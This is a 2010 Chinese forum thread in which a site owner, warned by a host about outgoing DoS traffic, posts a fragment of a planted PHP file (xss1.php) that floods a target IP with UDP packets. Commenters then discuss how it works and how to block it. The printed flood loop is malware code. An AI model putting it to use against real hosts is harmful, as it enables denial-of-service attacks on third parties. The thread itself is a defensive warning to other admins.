发一个php 攻击代码.大家注意.

诡谲 · 2010-12-4 12:03:10

今天收到服务商的警告.说有outgoing dos attack.并给了几个IP让我检查.
检查后发现一个用户的网站应该是被挂马,许多目录下存在这样一个文件: xss1.php,里面的内容如下:[ol]

$max_time){ break; }

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

if($fp){ fwrite($fp, $out);

fclose($fp); }}

echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>[/ol]复制代码请勿用于非法用途

[ 本帖最后由诡谲于 2010-12-4 12:19 编辑 ]

cnx · 2010-12-4 12:25:28

表示看不懂代码的我路过。

hz555 · 2010-12-4 12:26:40

这个应该不是马吧！都是代码！没连接地址！

tc101 · 2010-12-4 12:27:54

看不懂

wdlth · 2010-12-4 12:27:55

用socket而已，可以禁用的。

yugan300 · 2010-12-4 12:28:43

fsockopen 使用udp协议打开远端服务器的一个随机端口
发射65535次。

小白 · 2010-12-4 12:29:06

难道这是dos？？

liheyuan · 2010-12-4 12:29:07

这个是被挂的马吧？
相当于个小“僵尸”了，呵呵，接受黑客的URL输入参数IP向该IP的端口发UDP Flood攻击。。
网站有上传功能的应该小心。

[ 本帖最后由 liheyuan 于 2010-12-4 12:30 编辑 ]

zllovesuki · 2010-12-4 12:30:08

这是端口扫描。

zllovesuki · 2010-12-4 12:30:45

呃，看错了，看到65535就自动默认了。。

		立即注册	自动登录	找回密码
密码			立即注册